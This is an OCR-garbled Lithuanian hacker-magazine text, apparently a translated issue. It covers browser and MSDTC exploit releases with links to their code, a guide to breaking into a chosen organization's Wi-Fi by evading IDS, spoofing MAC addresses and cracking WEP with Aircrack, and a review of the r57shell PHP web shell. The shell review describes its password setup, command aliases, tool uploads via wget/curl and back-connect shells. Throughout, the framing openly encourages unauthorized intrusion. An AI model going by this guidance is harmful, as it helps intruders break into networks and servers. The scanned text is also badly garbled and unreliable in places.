žinerijos metodus. Žodžiu, šis eksploi- 
tas — realus daiktas, kuris retai pasiro- 
do viešuose šaltiniuose. 


[svei ai] Eksploito autorius yra ko- 
mandos Computer Terrorism 
(www.computerterrorism.com) hakeris, 
pasivadinęs Stuart Pearson slapyvar- 
džiu. Palinkėkime jam sėkmės tolimes- 
niuose darbuose :) 


FIREFOX 1.5 BUFFER 
OVERFLOW EXPLOIT 


[aprašymas] Pastarąjį mėnesį 
kaip niekad užderėjo prieš žinomas 
naršykles nukreiptų eksploitų. Jei- 
gu naujas IE pažeidžiamumas nie- 
ko nestebina, tai buferio perpildy- 
mas elitiniame FireFox daugelį pri- 
vertė kaip reikiant susimąstyti. 
Pats eksploitas neužima daug ko- 
do, kadangi jis tik avariniu būdu už- 
baigia programą. Tačiau aš esu vi- 
siškai tikras, kad uždaruose šalti- 
niuose saugomas kodas, kuris pa- 
leidžia kokią nors programą. 
Buferio perpildymas realizuojamas 
suformavus ilgą dokumento antraš- 
tę (5000 simbolių). Taip nutinka nu- 
spaudus nuorodą, kuri iškviečia pa- 
prasčiausią JavaScript'ą. 


[apsauga] Šiuo metu nėra apsau- 
gos nuo šio eksploito. Klaida aptik- 
ta paskutinėje naršyklės versijoje ir 
patikrinta Win2k bei WinXp +SP2 sis- 
temose (antrąjį variantą patikrinau 
pats :)). 


[nuorodos] Eksploito tekstą galima 
rasti adresu www.securitylab.ru/poc/ 
extra/242789.php. Čia taip pat yra 
ir techninis pažeidžiamumo aprašy- 
mas. 


[blogio įvertinimas ir potencialas] 
Kaip jau buvo paminėta, eksploito at- 
ličkama DoS ataka nėra vienintelė 
pasekmė. Gali būti, jog greitai mes 
pamatysime eksploitą, kuris vienoje 
labiausiai apsaugotų naršyklių nuo- 
toliniu būdu vykdo laisvai pasirinktą 
kodą. 


[sveikinimai] Savo eksploitų kū- 
rimo sugebėjimus mums parodė 
ZIPLOCK, su kuriuo gali kontaktuo- 
tis kietu adresu sickbe- 
atz(Ogmail.com. Siųskite jam sa- 
vo klausimus, ir jis būtinai atsa- 
kys :). 


MSDTC REMOTE EXPLOIT 


[aprašymas] Šį mėnesį taikiklyje vėl at- 
sidūrė „Microsoft“. Be jos naršyklėje ap- 
tiktos klaidos hakeriai surado dar vieną 
„paskirstytų tranzakcijų koordinatoriaus“ 
serviso, aka MSDTC, klaidą. Kaip paaiš- 
kėjo, šiame servise buvo užsislėpęs bu- 
ferio perpildymas, kuris tam tikromis ap- 
linkybėmis gali sustabdyti sistemą arba 
įvykdyti laisvai pasirinktą kodą. 

Šiaip jau blogiečiai parašė net du klastin- 
guosius eksploitus: pirmasis įvykdo lais- 
vai pasirinktą kodą (atidaro jungtį su 
cmd.exe), antrasis vykdo DoS, tuo pačiu 
sustabdydamas visos sistemos darbą. 
Tarp pažeidžiamų sistemų atsidūrė 
Win2000, WinXP, WinXP+-SP1 ir Win2003. 
Visos likusios sistemos nėra pažeidžiamos. 
Eksploitas parašytas su C++, todėl jo 
kompiliavimui prireiks lcc. Priminsiu, jog 
ji galima pasiimti iš www.nsd.ru. 


[apsauga] Apsisaugoti nuo eksploito ga- 
lima įdiegus atitinkamus MS pataisymus. 
Nuorodas į Win2k, WinXP ir Win2003 sis- 
temoms skirtus pataisymus galima rasti 
adresu www.securitylab.ru/vulnerability/ 
241002.php. 


[nuorodos] Eksploitą galima rasti čia: 
www.securitylab.ru/poc/extra/ 
242546.php (laisvai pasirinkto kodo vyk- 
dymas) arba čia: www.securitylab.ru/poc/ 
extra/242546.php (atsisakymas aptar- 
nauti). www.securitylab.ru/vulnerability/ 
source/241008.php puslapyje tu rasi 
techninę dokumentaciją. 


[blogio įvertinimas ir potencialas] Dar 
vienas prieš „Microsoft“ nukreiptas eks- 
ploitas korporacijos reputaciją sumažino 
keliais punktais. Tačiau aš esu įsitikinęs, 
kad hakeriai ties tuo nesustos ir tyrinės 
dėdės Bilo servisus tol, kol Windows ko- 
de bus ištaisyta paskutinė klaida :) 


[sveikinimai] Eksploitą parašė hakeris 
Swan (swan(00x557.org), kuris perduo- 
da linkėjimų visiems jį pažįstantiems ir my- 
lintiems :). 
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Wi-Fi po skalpeliu 

TOLIMAIS 2002 METAIS DEFCON DALYVIAI 
ATLIKO NEDIDELĮ TYRIMĄ, KURIS LABIAU 
PANAŠĖJO Į ĮSISKVERBIMO | BELAIDŽIUS 
TINKLUS SPORTO RUNGTYNES. IŠSTUDI- 
JAVUS DAUGIAU NEI 500 APLINK ESANČIŲ 
PRIĖJIMO TAŠKŲ, DALYVIAI SURINKO ĮD0- 
MIĄ STATISTIKĄ: APIE 3096 BELAIDŽIŲ TIN- 
KLŲ SAUGOJOSI WEP PROTOKOLU, KAS 
PENKTAME TINKLE ESSID REIKŠMĖ BUVO 
NURODYTA „PAGAL NUTYLĖJIMĄ“, 0204 
BELAIDŽIŲ TINKLŲ VI VISIŠKAI NESISAUGOJO 
NUO PRIĖJIMO IS IŠORĖS. GALIU TAU PA- 
SAKYTI, KAD ŠIUO METU PAS MUS STATIS- 
TIKA NE KĄ GERESNĖ. TIK NEDIDELĖ 
802.11 TINKLŲ DALIS APSAUGOTA LABIAU, 
NEI VIEN TIK WEP PROTOKOLU IR MAC AD- 
RESŲ FILTRAVIMU. O JEIGU JAU TAIP YRA, 

TUOMET MES TURIME PROGĄ APIE TAI PA- 
SIŠNEKĖTI. 


Pozityvi įsiskverbimo į 

belaidžius 802.11 tinklus patirtis 
[Ruošiamės atakai] Iš aukščiau pateiktos statistikos 
lengva suprasti, kad turint nešiojamąjį kompiuterį, tam 
tikras programas ir šiek tiek žinių, galima įsiskverbti į 
9096 802.11 tipo tinklų. O jeigu įsilaužėlis turi gilesnių 
žinių apie belaidžius tinklus ir tam tikrų hakerio įgūdžių 


(pavyzdžiui, socialinės inžinerijos), sėkmingų įsiskverbimu pro- 
centas artėja prie 100. Mes jau rašėme apie Wi-Fi laužima, 
tačiau šiandien mes į hakerišką patirtį šioje srityje pažiūrėsime 
iš praktinės pusės. 


[Ko reikia] Wi-Fi laužimui hakeriai naudoja šiuos daikčiukus: 


— nešiojamąjį kompiuterį; 

— Wi-Fi plokštę su Prism2 mikroschemų rinkiniu (iš esmės gali- 
ma dirbti ir su kitomis, pavyzdžiui, Hermes, tačiau vis dėlto ge- 
riau Prism, kadangi būtent tokioms plokštėms kuriama didžioji 
mums reikalingos programinės įrangos dalis) ir su galimybe pri- 
jungti išorinę anteną; 

- antena, o dar geriau dvi: siaurakryptė ir plačiakryptė; 

— automobilį; 


Taip būtų idealiu atveju. Savaime suprantama, daugelis žmonių 
negali prie kiekvieno punkto padėti pliusiuko. Dėl to gali tikti ir 
toks variantas: nešiojamasis kompiuteris su Wi-Fi moduliu ir 
dvi kojos. Arba dar vienas variantas: namų kompiuteris, iš drau- 
go pasiskolinta plokštė ir prie jos prijungta savo rankomis pas- 
kubomis padaryta kryptinė antena, kuri iš balkono nukreipiama 
į kokios nors netoli esančios firmos biurą. Taip pat nederėtų 
neįvertinti kišeninių AK galimybių, todėl jeigu tu turi delninuką 
su Wi-Fi moduliu (pageidautina iPac arba Zaurus), jis gali iš 
tiesų praversti. 

Kokią operacinę sistemą pasirinkti visam šiam reikalui? Aš pa- 
pasakosiu apie *nix sistemoms skirtas programas. Juk jos ne- 
mokamos ir suteikia daugiau galimybių. 


[Taikinio pasirinkimas] Apie tai, kaip miesto centre surasti ne- 
apsaugotą tinklą ir už dyką pasėdėti internete, mes jau rašė- 
me, be to, mums tai dabar nelabai įdomu. Aptarsime kitą va- 
riantą: hakeriui reikia patekti į konkretų belaidį tam tikros orga- 
nizacijos tinklą. Jis nežino, kaip gerai tas tinklas apsaugotas, 
nuo ko gi pradėti? 

Pirmas dalykas, kurį reikia padaryti — atlikti internetinę žvalgy- 
bą. Reikia kuo daugiau sužinoti apie tai, kas organizacijoje užsi- 
ima IT klausimais, kaip jie tuo užsiiminėja, t.y. apie savo prieši- 
ninką sukaupti kaip galima daugiau informacijos. Kam to gali 


prireikti? Visų pirma, galima surasti daugybę sau naudingos in- 
formacijos, susijusios su firmos naudojama apsisaugojimo tech- 
nologija. Antra, atsakingų kompanijos asmenų vardų žinojimas 
gali praversti panaudojant socialinę inžineriją. 

Toliau eina vietovės apžiūra. Įsilaužėlis atakai pasirenka pato- 
giausią vietą. Būna taip, kad tinklas niekaip neapsaugotas. ta- 
čiau prie jo prisijungti galima tik tuomet, kai ėsi visiškai arti. 
Tokiu atveju hakeriui prireiks galingos kryptinės antenos. Taip 
pat galima imtis ekstremalesnių veiksmų: kokiu nors pagrindu 
patekti į pastato vidų ir atlikti įsilaužimą „iš vidaus“, tačiau tokiu 
atveju viską reikia padaryti tyliai, kadangi organizacijoje gali būti 
Idiegta IDS sistema. 


ĮStudijuojam tinklo srautą] Aš tau papasakosiu apie keletą 
tinklų aptikimo ir jų srauto analizės programų. Šiaip jau yra du 
būdai, kaip aptikti belaidžius tinklus: tai aktyvaus ir pasyvaus 
skenavimo metodai. Aktyvus skenavimas reiškia bandomosios 
užklausos išsluntimą priėjimo taškui (AP), tikintis iš jo gauti at- 
sakymą, kuriame bus informacija apie ESSID, duomenų perda- 
vimo kanalą, naudojamą duomenų šifravimą, signalo lygi ir duo- 
menų perdavimo greitį. Būtent taip veikia NetStumbler ir MiniS- 
tumbler. Problema tame, kad adminas gali priėjimo tašką leng- 
vai sukonfigūruoti taip, kad jis neatsakinės į panašias užklau- 
sas Ir taps nematomas NetStumbler'iui. Be to, signatūrinės IDS 
aptinka skenavimus su NetStumbler'iu, todėl tu ji naudodamas 
gali atkreipti į save dėmesį. Dar vienas triukas, kurio adminas 
gali imtis — tai suklastoto freimo-atsakymo išsiuntimas į tavo 
freimą-užklausą su iš anksto sukonfigūruotais melagingais duo- 
menimis, kad taip tave suklaidintų. Tai galima realizuoti, pavyz- 
džiui, su programa File2Air, kurią sukūrė Joshua Wright. Dar 
vienas aktyvaus skenavimo trūkumas — tai intensyvus akumu- 
liatoriaus įkrovos naudojimas. 

Pasyvus skenavimas naudoja Wi-Fi plokštės stebėjimo režimą. 
Taip perimamas visas tinklo srautas, pereinantis per visus ka- 
nalus. Mano nuomone, geriausias pasyvaus skenavimo įrankis 
yra Kismet, kurią sukūrė Mike Kershaw. Iš esmės ši programa 
skirta Wi-Fi srauto analizei ir IDS sistemų kūrimui. Kismet su- 
derinama su visomis plokštėmis, kurios moka dirbti rgnon reži- 
me, ją galima įdiegti Linux sistemoje, taip pat ir į delninukams, 
——————— ||| 


Google galima rasti apsčiai informacijos apie kismet veikimą 


FreeBSD ir OpenBSD, MacOSX (ir net į langines, i pagalbą pa- 
sitelkus Cygwin) skirtus distributyvus. Surasti paskutinę Kismet 
versiją galima adresu www.kismetwireless.net. Prieš kompiliuo- 
jant Kismet aš tau primygtinai rekomenduoju apsirūpinti jeigu 
jo dar neturi) Ethernal'u, kuris pravers studijuojant Kismet su- 
formuotus dump'us. Jeigu turi GPS imtuvą, tai tuomet neblogai 
būtų įdiegti dar ir GpsDrive, kuris integruojasi su Kismet. Kismet 
kompiliavimas pakankamai paprastas ir neturi sukelti jokių sun- 
kumų. Jeigu kas nors bus neaišku, tai perskaityk README, ten 
viskas labai išsamiai aprašyta. 
Norėdami pritaikyti Kismet konfigūraciją mūsu reikmėms, atsi- 
darome /usr/local/etc/kismet.conf. Čia reikia padaryti keletą da- 
lykų: 

aijungti MAC adresų filtravimą 

leisti užmegzti susijungimus su IP adresu 127.0.0,1 

maxclient priskirti 1 

į source reikšmę įrašyti perimamų duomenų šaltinį 
— sukonfigūruoti intervalą tarp įrašymo operacijų 
— parametrams noiselog ir beaconlog priskirti false 
- vartotojui, kuriuo tu paprastai dirbi, suteikti Kismet paleidimo 
teisę, jeigu tu, be abejo, nesiruoši dirbti root vardu 
- jeigu reikia, sukonfigūruoti GPS 


Dabar pakalbėsime apie tai, ką naudingo sugeba ši progra- 
ma. Visų pirma, ji išveda informaciją apie tai, jog priėjimo 
taške konfigūracija palikta „pagal nutylėjimą“, aptinka bando- 
mąsias „pasimetusių“ tinklo mazgų užklausas, taip pat ban- 
domąsias NetStumbler užklausas, nurodžius teisinga WER ga- 
li veikimo metu dešifruoti paketus, o aptikus IP adresus nu- 
stato, koks protokolas naudojamas jiems atpažinti (ARR TCP 
UDP arba DHCP). Antra, ji generuoja pcap formato dump'us, 
todėl juos po to galima peržiūrėti su tinklo protokolų analiza- 
toriumi Ethernal. 

Egzistuoja daugybė programų, mokančių aptikti belaidžius 
802.11 standarto tinklus, tarp jų aš išskirčiau tokius įrankius, 
kaip Airfart ir konsolinį įrankį WifiScanner. Abi šios programos 
veikia tik su plokštėmis, kuriose sumontuotas Prism mikrosche- 
mų rinkinys, ir joms reikia linux-wlan-ng tvarkyklių. 


[Apeiname barjerus] Paprasčiausias Wi-Fi tinklo apsaugoji- 
mas nuo netiesėto įsilaužimo gali būti įgyvendinamas tokiais 
metodais, kaip: tinklo ESSID paslėpimas nuo pašalinių akių. 
MAC adresų filtravimas ir protokolų filtravimas. Pabandykime 
pažiūrėti, ką mes galime panaudoti prieš šiuos išvardintus me- 
todus. 

Jeigu tinklas uždaras, tai jo ESSID (Extended Service Set ID — 
tarnybinis tinklo identifikatorius) nėra tame tinkle cirkuliuojan- 
čiuose paketuose. Nežinodamas tinklo ESSID, įsilaužėlis negali 
prie jo prisijungti. Iš tiesų ESSID yra pakartotinės autentifikaci- 
jos ir pakartotinio prisijungimo užklausose, o tai reiškia, kad 
ESSID galima sužinoti pasiuntus kompiuteriui suklastotą deau- 
tentifikacijos tinklo paketą priėjimo taško MAC adreso vardu. 
Po to reikia perimti tinklo mazgo siunčiamą freimą. kuriame yra 
mus dominantis ESSID. Tai galima lengvai realizuoti su įrankiu 
essid jack, kuris įeina į AirJack programu paketą. Savo straips- 
nyje apie DoS atakas Wi-Fi tinkluose aš jau rašiau apie AirJack, 
todėl čia savo dėmesį skirsiu šiek tiek kitiems dalykams. 
Galimas toks įvykių variantas, kuomet priėjimo taškas yra vie- 
nas ir šiuo metu nėra su juo bendraujančių tinklo mazgų. 
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53 149.6238 SmcNetwo 6b:26it Broadcast 
60 149.9538 Primečle 02:8b:93 Broadcast 
61 150.1358 SmcNetwo Bi 
82 150.2382 SmcNetwo Bl 


IEEE 80211 Beacon frame 
IEEE 802.11 Beacon frame || 
JEEE 802.11 Beacon frame 
IEEE 802,11 Beacon frame 
IEEE 802,11 Beacon frame 
IEEE 802.11 Beacon frame 
IEEE 802 11 Reacon frame 
IEEE 802.11 Beacon frame 
IERE 802, 11 Beacon frame 
JERE 802,11 Beacon frame 
IEEE 802.11 Beacon frame 
IEEE A02.11 Rancaniams 


85 152.6162 Primečie 02:8b:93 Broadcai 
65 152.8549 Z-Com 79.6f:d6 Broadcast 
67 154.6268 Sercomm fb:0c:Oc Broadcast 
68 154.8689 Primečle 02:8b:93 Broadcast 
69 157.1868 Sercomm fb:0c:0c Broadcast 
IN. 157 2892 Sarcamm EkiAc- Os Brnadrast 


I Fame 66 (70 Bytes on wire, 70 Bytes captured) 


[60 80 00 00 GO fr fr fr fr. TT IT 00 6053 79 Bf d8 

10 00 60 53 79 Bf d6 b0 47 97 c3 df ff 41 00 00 00 
|20 64 00 11 00 00 11 44 6f 6e 6e 65 72 73 63 68 77 
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Kismet dump'o peržiūrejimas su Ethemal 


Tokiu atveju galima išbandyti tą ESSID variantą, kuris būdin- 
gas konkretaus priėjimo taško gamintojo sukonfigūruotiems 
nustatymams „pagal nutylėjimą“. Kai kurie adminai, uždrau- 
dę priėjimą prie belaidžio tinklo, nė nepagalvoja pakeisti šios 
reikšmės. 

MAC adresų filtravimas iš viso apeinamas paprasčiau nei pa- 
prastai. Reikia išstudijuoti tinklo srautą, iš jo išgaudyti atitinka- 
mus MAC adresus, o kai koks nors tinklo mazgas atsijungs nuo 
tinklo, galima prie jo prisijungti, sau priskyrus tokį patį MAC. 
Jeigu laukti atsijungimo nesinori, tuomet šį mazgą galima iš- 
mesti iš tinklo, jį užDoSinant :). 

Protokolu filtravimas panaudojamas kur kas rečiau už MAC 
adresų filtravimą ir ESSID slėpimą, kadangi tai ne visada pa- 
togiai atsiliepia darbui tinkle ir ne visuose priėjimo taškuose 
galima tai normaliai panaudoti. Jeigu tu susidūrei su tokiu 
tinklu, tai galiu tau pasiūlyti pabandyti paieškoti tinkle leidžia- 
mu protokolų pažeidžiamumų. Paprastai tokie protokolai bū- 
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NetStumbler 
Mindows sistemoje veikianti Ir darbui su Wi Fi skira programa 


Kone vienintelė nemokama 


na SSH ir HTTPS. Jeigu naudojamos pasenusios protokolų ver- 
sijos, tai tikriausiai juose yra skylių, kurias galima išnaudoti. 
Be to, čia ganėtinai naudinga gali pasirodyti Man-in-the 
Middle tipo atakų technika. 


[Sudorojame WEP] Apie WEP protokolo nulaužimą jau prirašy- 
ta tiek, jog susidaro įspūdis, kad tai yra vos ne vienintelė ir pati 
svarbiausia belaidžių tinklų apsaugos nuo įsilaužimų priemonė, 
bei kad tuo apsiriboja Wi-Fi tinklų saugumo priemonės. Ką gi, 
sprendžiant pagal statistiką, kas trečiu atveju tai teisinga. Išski- 
riami keli atakų prieš WEP tipai: 
- pilno perrinkimo metodas — galimas tik 40 bitų rakto parin- 
kimas (WEP taip pat panaudojami 64, 128, 256 ir 512 bitų 
raktai, tačiau kadangi pirmieji 24 bitai užima taip vadinamą 
inicializacijos vektorių (IV), kuris perduodamas atviru pavidalu, 
tai galima sakyti, kad raktų ilgis yra 40, 104 ir t.t, bitu), lačiau 
tokia ataka gali trukti išties ilgai, todėl ji neefektyvi. 
- ataka pagal žodyną — gali būti naudojama prieš vieną perim- 
tą paketą, tai atliekama programoje Wepattack: priešingai nei 
pilno perrinkimo metodo atveju, čia įmanomas 104 bitų rakto 
dešifravimas 

pilno perrinkimo metodas, panaudojant optimizuojančius al- 
goritmus — gali leisti sutrumpinti pilno 40 bitų rakto perrinkimo 
laiką nuo keleto savaičių iki pusės minutės, tačiau taip gali būti 
tik įvykiams susiklosčius hakeriui palankia linkme, o šiaip šios 
atakos taip pat neefektwios (64 bitų šifravimas sutinkamas la- 
bai retai) 

FMS ataka — labai įdomus mechanizmas. leidžiantis iš 6-8 
mln. paketų nustatyti WEP reikšmę 
- optimizuotos FMS atakos — pavyzdžiui, hakeris H1kari suge- 
bėjo FMS algoritmą optimizuoti taip, kad būtinų paketų kiekis 
sumažėjo iki 500 tūkstančių 
- kitos atakos — čia galima priskirti įvairias pagalbines atakas, 
pavyzdžiui, tinklo srauto generavimas reikiamo paketų kiekio su- 
rinkimo procesui paspartinti. 
Realiai WEP nulaužimui reikalingų perimtų tinklo paketų kiekis 
gali svyruoti ganėtinai plačiame diapazone, tačiau paprastai tai 
yra 1,5-2 mln. paketų. 
Šiandien WEP laužiančios programos pagrinde naudoja taip va- 
dimamą ataką Fluerio-Mantino Šamiro metodu, arba FMS ata- 
ką, kurią 2001 metais sukūrė Scott Fluhrer, Itsik Mantin ir Adi 
Shamir, plius įvairius šią ataką optimizuojančius algoritmus. Šian- 
dien viena geriausių programų WEP nulaužimui yra Aircrack. Be 
FMS atakos ji taip pat panaudoja keletą naujų atakų tipų, ku- 
riuos sukūrė hakeris KoreK. Norint nulaužti WEP Aircrack'ui rei- 
kia sušerti pcap formato bylą su perimtais paketais. 
Tinkluose, kuriuose srautas gana mažas, paketų surinkimo pro- 
cesas gali užtrukti ilgai. Airorack dokumentacijoje išsamiai ap- 
rašytas šios problemos sprendimo būdas, panaudojant papil- 
domą plokštę, kuri jau perimtus paketus vėl siunčia „į eterį“, iš 
anksto į juos įterpdama ARP užklausas (gudriai sugalvota, tie- 
sa?), kas leidžia sugeneruoti papildomą tinklo srautą atsakymų 
į šiuos paketus pavidalu. Mano nuomone, tai nėra labai pato- 
gus variantas, nes ne visi turi dvi Wi Fi plokštes. Šiuo atveju 
alternatyva galėtų būti programa File2Air, mokanti siųsti duo- 
menis stebėjimo režimu. 
Iš esmės yra dar vienas WEP sužinojimo būdas: jeigu tinklas 
prijungtas prie interneto, tai per jį patekus į kurią nors vieną 
vidinę mašiną, galima pabandyti nustatyti Wi-Fi sąsajos WEP 


"1; 8 ' aktą. Pavyzdžiui, Linux sistemoje 
ožių is saugomas byloje /etc/pemcia/ 
ias vireless.opts. 

YrM ka [Kas toliau?] Daugelio belaidžių 


2 tinklų apsauginis potencialas 
tuo ir baigiasi. Tačiau būna ir ki- 
taip. Tinklas gali veikti panau- 

P T jodamas 802.1x standartą 

dot1x), jame gali būti paleistas 

virtualus privatus tinklas (VPN) 

P Tokiu atveju įsilaužimo sėkmė 

priklausys nuo daugelio skirtin- 

gų faktorių. Universalaus toli- 
nesnių veiksmų algoritmo tiesiog nėra 


mos skirtingos EAP protokolo versijos: EAP-TLS, EAP-TTLS, EAP- 
R EAP-LEAP EAP -MD5. Apie paskutiniąsias dvi galiu pasa: 
jos pažeidžiamos. Yra tokios programos, kaip /eap- 
„ Asleap-imp, skirtos atakoms prieš EAP-LEAP EAP-MD5 
žeidžiamas Man-in-the-Middle atakai. Atakuojantis gali tarp 
tinklo mazgo Ir RADIUS serverio įdiegti suklastotą priėjimo taš 
perimti visą perduodamą tinklo srautą, taip pat ir vartotojo 
dą su slaptažodžiu. 

tekimo į belaidžio tinklo pagrindu veikiantį VPN analog 
ai, kuri gali būti panaudojama laidiniuose tinkluose. Daugelis 


ing Protocol) arba IPSec. PPTP yra skirtas eksploitas de- 
sukurtas veikėjo Aleph One. Ištestuoti /PSėc saugumą 
gali padėti įrankis /ke-scar 


ceit.C 


[IDS sistemos] Viso laužimo metu tu neturi pamiršti, jog, tinkle 
būti įsilaužimų aptikimo sistema (IDS — Intrusion Detection 
System), kuri stebi tinklo funkcionavimą ir išaiškina skirtingas ja. 
me pasireiškiančias anomalijas, t.y. tave. Norint nepastebimai 
patekti į tinklą, tau praverstų tam tikros žinios apie šių sistemų 
veikimo principus. IDS gali būti signatūrinė, veikianti žinių bazės 
pagrindu ir mišraus tipo. Signatūrinės IDS turi skirtingų tam tik- 
roms atakoms būdingų įvykių duomenų bazę. Žinių bazės pagrin- 
du veikiančios sistemos renka tinklo darbo statistiką normalio- 
mis jo funkcionavimo sąlygomis ir signalizuoja apie įvairius nukry- 
pimus. Kokie įsilaužėlio veiksmai gali sukelti IDS aliarmą? 
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Aircrack darbo rezultatas 


iavimas. Dėl to naudok tik pasyvų 
skenavimą. Antra, paketų su įtartinu ESSID siuntimas. |tarti 
niems paprastai priskiriama: tušti, transliuojantys ESSID 
įtraukti į juoduosius sąrašus ir Lt. (beje, šiuose sąrašuose 
paprastai būna skirtingų hakeriškų programų naudojami ES- 
SID, todėl prieš naudojant tokias programas kartais reikia 
šiek tiek pataisyti jų išeities tekstus). Trečia, neteisinga 
klastotas MAC adresas (esmė tame, kad MAC adresas 
klauso nuo gamintojo ir nuo konkretaus belaidės 
delio, o IDS labai nepatinka, kai į jos akiratį pakliūna 
nomo“ gamintojo įranga). Peržiūrėti skirtingos 
gos adresų diapazonus galima Kismet kataloge esančiose 
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bylose conf/ap manut ir conflolient manut 2 
[)(1 Ir pabaigai. Prieš pasiryždamas dviejų valandų ka 
nei bandant įsilaužti į tinklą, patyręs hakeris visada apžiūri 
vietovę ieškodamas kreida paliktų ženklų kai kurie ger 
hakeriai taip užrašo visus įėjimui į tinklą reikalingus duo 
menis. 
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Ė Skriptai 
ži šeimininkės tarnyboje 
PRIEŠ KELETĄ METŲ, KAI WEB PROGRA- 
MAVIMAS DARTIK RADOSI, DAUGELIS WEB 
A SKRIPTŲ BUVO TIESIOG PRIMITYVIOS SVE- 
E: ČIŲ KNYGOS IR LANKYTOJŲ SKAITLIUKAI. 
z 


O DABAR, KARTU SU PAŽANGIAIS FORU- 
MAIS IR SMS SISTEMOMIS, PLATINAMI RE- 
TI, TAČIAU NEPAPRASTAI NAUDINGI SKRIP- 
TAI, KURIE GALI PAKEISTI NEMAŽAI ĮPRAS- 
TŲ PROGRAMŲ. 


HACK 


Naudingi skriptai kiekvienai dienai 
težahal) v1.23 

ma: PHP 

Didis: 85 Ko 

Administruoti nutolusį kompiuterį galima įvairiai. Be abe- 
jo, geriausi variantai vizualus administravimas su Re- 
mote Administrator (ww.radmin.com) tipo sistemomis ar- 
ba prisijungiant per SSH. O ka danyti, Jeigu tokios praban- 
gos nėra? Tarkim, tu aptikai pažeidžiamą skriptą, ir vienin- 
telis dalykas, kurį tu gali padaryti — į nutolusi tinklo mazgą 
perkelti bylą. Tokiu atveju idealus receptas būtų perkelti 
ten web shellą, ty. primityvią web aplinką, su kuria bus 
galima vykdyti komandas, ir tiesiog naršyklės lange peržiū- 
rėti atlikto darbo rezultatą. Yra gana daug šios idėjos rea- 
lizacijų, tačiau ypatingos pagarbos nusipelno PHP skriptas 
r57shell, kurį sukūrė žinomos security grupės RST/GHC. 
Darbinis arkliukas, šiame skripte viskas apgalvota iki 
smulkmenų. Tu kada nors matei web shellą su autori- 
zacijos galimybe? Man neteko. Nors, be jokios abejo- 
nės, tokia banali galimybė gali praversti, jeigu tu nori 
apsaugoti save, kad shellu nesinaudotų svetimi asme- 
nys. Rekomenduočiau visų pirma atsidaryti skripto išei- 
ties tekstus ir ten surasti už autorizaciją atsakingą sky- 
relį. Viskas, ką reikia padaryti, — konstantos Sauth reikš- 
mę priskirti 1, o su konstantomis $name ir $pass nuro- 
dyti pageidaujamą vartotojo vardą ir slaptažodį. Po to 
šio skyrelio turinys bus maždaug toks: 


SCENA 


UNIXOID 


CODING 


Šauth = 1; // aktyvuojam autorizaciją 
"petriux“; // vartotojo vardas: 


megarulez“, // vartotojo slaptažodis. 


Po autorizacijos visos skripto galimybės — tavo paslau- 
goms. Kitaip tariant, visi galimi veiksmai, kurie gali būti 
atlikti su šia sistema. Dėl skirtingai sukonfigūruotų sau- 


UNITS 


gumo nustatymų, web serverio teisių ir kitų parametru galimų 
veiksmų sąrašas viename serveryje smarkiai skiriasi nuo priei- 
namų veiksmų kitame. Laimė, r57shell automatiškai nustato, 
kokius veiksmus atlikti galima, ir kokių — ne. 

Pati pagrindinė web shello užduotis — vykdyti nuotolinės ko- 
mandas. Būtent todėl naršyklėje tu visų pirma pamatysi ko. 
mandos įvedimo ir darbinio katalogo pakeitimo laukus, taip pat 
didelį tekstinį lauką, į kurį bus išvedamas rezultatas. Norint sau 
palengvinti rutininį darbą, kūrėjai siūlo pasinaudoti specialiais 
aljasais (sutrumpinimais). Pagal nutylėjimą į programos bazę 
įtraukta apie 25 aljasus, kurie leidžia greitai atlikti koreguojamų 
(į kurias leidžiama rašyti) bylų, bylų su slaptažodžiais ir bash 
komandų istorijų paiešką. Pavyzdžiui, jeigu meniu pasirinktu- 
mei find all writable files, tai r57shell automatiškai įvykdytų 
komandą find / -type f -perm -2 -Is. Skriptas komandos vyk- 
dymui išnaudoja visas galimybes, perrinkdamas exec, shell exec, 
system, passthru ir popen komandų vykdymo variantus, taigi 
kitaip, nei daugelis kitų analogų, šis įrankis yra universalus. 
Su r57shell tu gauni galimybę lengvai į serverį perkelti visas tau 
reikalingas bylas, tą tu gali padaryti tiek iš lokalaus kompiute- 
rio, tiek ir iš nutolusio serverio, kam panaudojami wget, fetch, 
lynx, links, get arba curl. Taip tu gali persiųsti visus tau reikalin- 
gus įrankius (skenerius, eksploitus, logų nekuriančius proxy ser- 
verius, kitus skriptus ir t.t.), juos sukonfigūruoti ir, jeigu leidžia 
teisės, net paleisti. 


Nepaisant nedidelio dydžio, skrip- 
tas savo arsenale dar turi nema- 
žai naudingų funkcijų. Skriptas 
apie nutolusį serverį surenka visą 
prieinamą informaciją (operaci- 
nės sistemos, phpinfo(), ohp bei 
web serverio versijos ir t.t.). Į 
r57shell kodą įmontuota keletas 
safe mode apribojimų apėjimo 
metodų, kurie kliudo nuotoliniu 
būdu atlikti daugelį užduočių. Ga- 
lų gale į jį įmontuoti darbo su 
duomenų bazėmis (MySOL, 
MSSOL, PostgreSOL ir Oracle) 
komponentai. Taip tu gali nuko- 
pijuoti bazės turinį, įvykdyti lais- 
vai pasirinktą užklausą, peržiūrėti 
lentelių struktūrą. Visas šis ma- 
lonumas veikia tiek Windows, tiek 
ir *nix tipo operacinėse sistemo- 
se. Beje, r57shell nebūtina nau- 
doti vien tik su naršykle: tavo pa- 
slaugoms čia taip pat back-con 
nect ir bind--shell. Išsamiau apie 
tai gali perskaityti iškarpoje. 
Alternatyva: r57pws 1.0 (perl. http://rst.void.ru/download/ 
r57pWws.ixt). 


RST MySaL v2.0 


Kiekvienas žino, kad MySOL lenteles serveryje galima lengvai 
paredaguoti su galingu skriptu phpMyAdmin (www.phpmyad- 
min.net). Su duomenų bazėmis dirbama tiesiog naršyklės lan- 
ge, o tau tereikia | serverį perkelti archyvą su skriptu. Tačiau 
būtent čia ir iškyla nesklandumų. Visų pirma, phpMyAdmin di- 


Username and password 


Server For. article.ru 


Message r57shell 


Username 157 


Password kia 


Remember password 


Autorizacija priėjimui prie web shello: svetimas nepraeis! 


stributyvas užima beveik 3 Mb, atitinkamai išpakavus gaunasi 
dar daugiau. Antra, smarkiai užknisa daugybė PHP bylų, iš kurių 
sukomponuotas visas šis įrankis: jais ypatingai nepatogu ope- 
ruoti ir dar sudėtingiau slaptai įdiegti į serverį. Tačiau tai dar ne 
viskas. phpMyAdmin trūkumas dar ir tame, kad DB slaptažodis 
saugomas atviru pavidalu tiesiog tekstinėse skripto konfigūraci- 
nėse bylose. Tai akivaizdžiai jam nesuteikia garbės, ir šiaip, tai 
yra ganėtinai rimta saugumo skylė. 

Manau, aš sugebėjau tave įtikinti, jog reikia alternatyvos :). Visus 
šansus deramai įsitvirtinti šiose pareigose turi skriptas RST MySOL 
